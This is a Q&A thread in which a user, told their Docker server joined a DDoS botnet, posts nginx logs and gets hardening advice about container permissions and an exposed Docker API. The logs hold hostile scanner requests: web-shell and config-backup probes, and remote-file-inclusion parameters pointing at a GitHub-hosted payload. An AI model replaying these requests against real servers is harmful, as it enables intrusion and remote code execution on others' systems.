# docker container part of botnet via get requests (ddos)

Tags: docker, get, code-injection, ddos, botnet

Hi I get an message from my provider that my server is a part of a ddos-botnet. So i investigate my docker containers and found some corrupted containers (jitsi-meet-web (https://github.com/jitsi/docker-jitsi-meet), nextcloud (https://hub.docker.com/_/nextcloud) and a nginx container (https://hub.docker.com/_/nginx)). Someone tries to inject unsecure wordpress files via GET requests.

My question is: How is this possible and what can I do to prevent this from happening again?

The container of Jira, Confluence and Oracle DB & Ords are clean/fine.

My server runs as reverse proxy.

logs:

> 172.17.0.1 - - [16/Sep/2021:18:09:05 +0000] "GET /style.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:10 +0000] "GET /moduless.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:14 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:18 +0000] "GET /admin.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:22 +0000] "GET /index.php?3x=3x HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:24 +0000] "GET /boom.php?x HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:27 +0000] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:31 +0000] "GET /wp-content/db_cache.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:36 +0000] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:39 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:42 +0000] "GET /wpindex.php?idb=https://raw.github
> usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:47 +0000] "GET /larva.php?idb=https://raw.github
> usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:52 +0000] "GET /th3_err0r.php?php=https://raw.github
> usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:56 +0000] "GET /alfindex.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:09:58 +0000] "GET /alfa.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:07 +0000] "GET /wp-booking.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:11 +0000] "GET /cindex.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:17 +0000] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:21 +0000] "GET /wp-1ogin_bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:26 +0000] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:32 +0000] "GET /wp-includes/css/css.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:37 +0000] "GET /old-index.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:43 +0000] "GET /config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:48 +0000] "GET /wp-admin/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:51 +0000] "GET /wp-content/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:10:56 +0000] "GET /wp-includes/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:01 +0000] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:05 +0000] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:13 +0000] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:17 +0000] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:21 +0000] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:25 +0000] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:29 +0000] "GET /haders.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:32 +0000] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:39 +0000] "GET /legion.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:43 +0000] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:48 +0000] "GET /wp-includes/lfx.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:53 +0000] "GET /wp-includes/small.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:56 +0000] "GET /up.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:11:59 +0000] "GET /upload.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:03 +0000] "GET /config.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:05 +0000] "GET /test.php?Ghost=send HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:09 +0000] "GET /wp-content/langar.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:17 +0000] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 172.17.0.1 - - [16/Sep/2021:18:12:22 +0000] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
> 107.189.3.183 - - [16/Sep/2021:18:42:21 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 154 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64" "-"

> 198.98.55.220 - - [10/Oct/2021:09:13:11 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 154 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64" "-"
> 172.17.0.1 - - [10/Oct/2021:09:15:43 +0000] "GET /wp-admin/css/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:15:55 +0000] "GET /.well-known/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:16:09 +0000] "GET /sites/default/files/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:16:30 +0000] "GET /admin/controller/extension/extension/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:16:41 +0000] "GET /uploads/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:16:50 +0000] "GET /images/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
> 172.17.0.1 - - [10/Oct/2021:09:17:02 +0000] "GET /files/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"

Comment: Without seeing your application code it's hard to give more than very generic advice.  The two most common Docker things I've seen on SO are images that set up a non-root user but grant them unlimited `sudo` privileges, and images that set up a non-root user but `chown` all of the code to be owned by that user; both of those would allow the application to overwrite its own code in some circumstances.

Comment: thx for this informations, i added the repo urls to my text. I will follow up on these clues. I can assume that there is probably a permission problem on user/system side? Maybe also on folder side? I have mounted all the important volumes of the Docker container on my local system. Maybe I changed some permissions afterwards? Can that be the problem? I am only asking because I am looking for an exact clue. ;)

Answer (score 0):

It is very likely that the docker REST API port 2375 was used.

https://www.bleepingcomputer.com/news/security/teamtnt-hackers-target-your-poorly-configured-docker-servers/